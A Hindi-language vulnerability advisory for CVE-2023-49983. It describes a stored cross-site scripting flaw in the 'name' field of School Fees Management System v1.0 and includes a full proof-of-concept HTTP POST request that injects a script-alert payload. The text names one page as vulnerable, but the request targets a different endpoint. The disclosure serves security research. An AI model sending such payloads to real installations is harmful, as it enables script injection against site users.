
स्कूल फीस प्रबंधन प्रणाली v1.0 - "/management/class" पर "name" फ़ील्ड/पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता
विवरण: School Fees Management System v1.0 के "/management/class" घटक में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता, हमलावरों को name पैरामीटर में इंजेक्ट किए गए विशेष रूप से तैयार पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।
संवेदनशील उत्पाद संस्करण: School Fees Management System v1.0
सीवीई लेखक: Geraldo Alcântara
दिनांक: 28/11/2023
पुष्टि की तिथि: 19/12/2023
सीवीई: CVE-2023-49983
परीक्षण किया गया: Windows
भेद्यता का शोषण करने के लिए, उपयुक्त अनुमतियों वाले उपयोगकर्ता को "/ci_fms/admin/management/class" पृष्ठ तक पहुंचना होगा। इस पृष्ठ पर, उपयोगकर्ता को या तो किसी मौजूदा कक्षा को संपादित करना चाहिए या एक नई कक्षा जोड़नी चाहिए। इस प्रक्रिया के दौरान दुर्भावनापूर्ण पेलोड को "name" पैरामीटर में डाला जाना चाहिए।
POST /ci_fms/admin/action/edit_student/1/1 HTTP/1.1
Host: 192.168.68.148
Content-Length: 268
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydFBWs52W42v8XLGe
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/enrollment/class/1
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=c561k45qbrtsb34f2k30f936v0aijl01
Connection: close
------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="name"
<script>alert(document.domain)</script>
------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="parent"
1
------WebKitFormBoundarydFBWs52W42v8XLGe--
खोजकर्ता/श्रेय:
Geraldo Alcântara